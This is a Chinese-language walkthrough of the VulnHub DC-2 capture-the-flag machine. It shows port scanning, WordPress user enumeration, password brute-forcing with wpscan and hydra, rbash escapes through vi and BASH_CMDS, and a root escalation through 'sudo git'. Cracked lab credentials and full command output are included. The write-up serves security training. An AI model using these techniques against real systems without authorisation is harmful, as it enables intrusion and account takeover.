vulnhub-DC-2

信息收集

还是用nmap扫一下端口

└─# nmap -A -p1-65535 192.168.20.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-13 18:51 CST
Nmap scan report for 192.168.20.130
Host is up (0.0017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Did not follow redirect to http://dc-2/
|_http-server-header: Apache/2.4.10 (Debian)
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:27:CE:E2 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.68 ms 192.168.20.130

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.90 seconds

fscan每次感觉扫的不是很全

└─# ./fscan -h 192.168.20.130 

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
192.168.20.130:80 open
[*] alive ports len is: 1
start vulscan
[*] WebTitle http://192.168.20.130     code:301 len:0      title:None 跳转url: http://dc-2/
已完成 1/1
[*] 扫描结束,耗时: 2.940933399s

发现ssh端口做了改动7744，有个web服务在80，访问发现有跳转，这里需要改一下dns解析，在hosts文件中加上

192.168.20.130 dc-2
#win C:\Windows\System32\drivers\etc\hosts
#LINUX /etc/hosts

再次访问可以发现flag1

Flag 1:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

提示cewl工具可以收集网站字典，提到password，那么很有可能密码就在收集的字典中

cewl http://dc-2/ -w resu.txt

收集到的字典存在resu.txt中，在网站中我们可以注意到是wordpress搭建的网站，一般都会有后台，用dirb扫一下

─# dirb http://dc-2                          

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Nov 13 19:07:49 2024
URL_BASE: http://dc-2/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://dc-2/ ----
+ http://dc-2/index.php (CODE:301|SIZE:0)                                                                                                                            
+ http://dc-2/server-status (CODE:403|SIZE:292)                                                                                                                      
==> DIRECTORY: http://dc-2/wp-admin/                                                                                                                                 
==> DIRECTORY: http://dc-2/wp-content/                                                                                                                               
==> DIRECTORY: http://dc-2/wp-includes/                                                                                                                              
+ http://dc-2/xmlrpc.php (CODE:405|SIZE:42)                                                                                                                          
                                                                                                                                                                     
---- Entering directory: http://dc-2/wp-admin/ ----
+ http://dc-2/wp-admin/admin.php (CODE:302|SIZE:0)                                                                                                                   
==> DIRECTORY: http://dc-2/wp-admin/css/                                                                                                                             
==> DIRECTORY: http://dc-2/wp-admin/images/                                                                                                                          
==> DIRECTORY: http://dc-2/wp-admin/includes/                                                                                                                        
+ http://dc-2/wp-admin/index.php (CODE:302|SIZE:0)                                                                                                                   
==> DIRECTORY: http://dc-2/wp-admin/js/                                                                                                                              
==> DIRECTORY: http://dc-2/wp-admin/maint/                                                                                                                           
==> DIRECTORY: http://dc-2/wp-admin/network/                                                                                                                         
==> DIRECTORY: http://dc-2/wp-admin/user/                                                                                                                            
                                                                                                                                                                     
---- Entering directory: http://dc-2/wp-content/ ----
+ http://dc-2/wp-content/index.php (CODE:200|SIZE:0)                                                                                                                 
==> DIRECTORY: http://dc-2/wp-content/languages/                                                                                                                     
==> DIRECTORY: http://dc-2/wp-content/plugins/                                                                                                                       
==> DIRECTORY: http://dc-2/wp-content/themes/   

果然有后台，前面有密码字典，现在可以用wpscan扫一下有没有用户暴露

└─# wpscan --url http://dc-2 -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://dc-2/ [192.168.20.130]
[+] Started: Wed Nov 13 19:13:18 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.7
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:02 <========================================================================================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Nov 13 19:13:32 2024
[+] Requests Done: 74
[+] Cached Requests: 6
[+] Data Sent: 16.619 KB
[+] Data Received: 22.155 MB
[+] Memory used: 197.312 MB
[+] Elapsed time: 00:00:14

用户爆破

有三个用户，现在就可以进行爆破

─# wpscan --url http://dc-2 -U user.txt -P resu.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.20.130]
[+] Started: Wed Nov 13 19:15:46 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.7
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <=======================================================================================> (137 / 137) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing                                                                                                                                        
[SUCCESS] - tom / parturient                                                                                                                                          
Trying admin / log Time: 00:02:08 <======================================================                                         > (646 / 1121) 57.62%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Nov 13 19:18:14 2024
[+] Requests Done: 788
[+] Cached Requests: 36
[+] Data Sent: 356.206 KB
[+] Data Received: 414.659 KB
[+] Memory used: 263.445 MB
[+] Elapsed time: 00:02:28

可以看到jerry和tom都被爆破出来了，登录一下后台，发现不会跳转，我还以为是没登录成功卡了好久，这里根据自己用wordpress搭建博客的经验，在登录之后会跳转到url/wp-admin/edit.php，两个用户分别登录，tom中没有东西，在jerry中发现flag2

Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

这里实际上就是提示wordpress上面已经没东西了，那么我们就一个把目光看向ssh，这里收集到了两个用户密码，一般很多用户都喜欢密码复用，利用这一点，尝试登录ssh，发现tom可以登录，当然如果没有登录成功，也可以利用收集到的用户和密码进行爆破

hydra -L users.txt -P resu.txt -vV -o ssh.log -e ns IP ssh

连接之后可以看到有flag3,但是有rbash限制

有很多不同的限制外壳可供选择。其中一些只是普通的shell，有一些简单的常见限制，实际上并不是可配置的，例如rbash（限制Bash）rzsh和rksh（受限模式下的Korn Shell），这些都非常容易绕过。其他人有一个完整的配置集，可以重新设计以满足管理员的需求，如lshell（Limited Shell）和rssh（Restricted Secure Shell）。
一旦配置可以被管理员收紧，可配置的shell就更难以绕过。在这些shell上绕过技术通常依赖于管理员有点被迫为普通用户提供某些不安全命令的事实。。如果在没有适当安全配置的情况下允许，它们会为攻击者提供升级权限的工具，有时还会向root用户升级。
其他原因是，有时管理员只是Linux系统管理员，而不是真正的安全专业人员，因此从渗透测试人员的角度来看，他们并不真正了解部队的方式，并最终允许太多危险命令。

就是限制命令，将原有的命令仅允许部分可以执行，看看有哪些命令能执行

tom@DC-2:~$ compgen -c
if
then
else
elif
fi
case
esac
for
select
while
until
do
done
in
function
time
{
}
!
[[
]]
coproc
__expand_tilde_by_ref
__get_cword_at_cursor_by_ref
__git_eread
__git_ps1
__git_ps1_colorize_gitstring
__git_ps1_show_upstream
__grub_dir
__grub_get_last_option
__grub_get_options_from_help
__grub_get_options_from_usage
__grub_list_menuentries
__grub_list_modules
__grubcomp
__ltrim_colon_completions
__parse_options
__reassemble_comp_words_by_ref
_a2disconf
_a2dismod
_a2dissite
_a2enconf
_a2enmod
_a2ensite
_allowed_groups
_allowed_users
_apache2_allcomp
_apache2_conf
_apache2_mods
_apache2_sites
_available_interfaces
_cd
_cd_devices
_command
_command_offset
_complete_as_root
_completion_loader
_configured_interfaces
_count_args
_debconf_show
_dvd_devices
_expand
_filedir
_filedir_xspec
_fstypes
_get_comp_words_by_ref
_get_cword
_get_first_arg
_get_pword
_gids
_grub_editenv
_grub_install
_grub_mkconfig
_grub_mkfont
_grub_mkimage
_grub_mkpasswd_pbkdf2
_grub_mkrescue
_grub_probe
_grub_script_check
_grub_set_entry
_grub_setup
_have
_init_completion
_insserv
_installed_modules
_ip_addresses
_kernel_versions
_known_hosts
_known_hosts_real
_longopt
_mac_addresses
_minimal
_modules
_ncpus
_parse_help
_parse_usage
_pci_ids
_pgids
_pids
_pnames
_pygmentize
_quote_readline_by_ref
_realcommand
_rl_enabled
_root_command
_service
_services
_shells
_signals
_split_longopt
_sysvdirs
_terms
_tilde
_uids
_update_initramfs
_upvar
_upvars
_usb_ids
_user_at_host
_usergroup
_userland
_variables
_xfunc
_xinetd_services
dequote
quote
quote_readline
.
:
[
alias
bg
bind
break
builtin
caller
cd
command
compgen
complete
compopt
continue
declare
dirs
disown
echo
enable
eval
exec
exit
export
false
fc
fg
getopts
hash
help
history
jobs
kill
let
local
logout
mapfile
popd
printf
pushd
pwd
read
readarray
readonly
return
set
shift
shopt
source
suspend
test
times
trap
true
type
typeset
ulimit
umask
unalias
unset
wait
less
scp
ls
vi

注意到vi、export这里有几种绕过方法

vi绕过
vi 文件
esc 
:set shell=/bin/sh
:shell
此方法也只能拿到部分命令，cd等，但是cat这种命令仍然无法执行

环境变量绕过
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin
此方法可以使用cat

在/home/jerry文件夹下面可以拿到flag4，tom文件夹下有flag3，flag4中有提示

$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

提权

显然提示是提权，其实不提示git也能知道，这种简单靶机常见的就sudo和suid，这里是sudo，但是tom用户sudo密码不对，切换jerry

$ su jerry
Password: 
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

发现git是root权限

sudo git help config
!/bin/bash

root@DC-2:/home/jerry# whoami
root
root@DC-2:/home/jerry# ls /root
final-flag.txt
root@DC-2:/home/jerry# cat /root/final-flag.txt
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

至此靶机攻克

结语

此靶机也是基础靶机，主要考察信息收集，对于收集的信息多方位利用，dns，以及git提权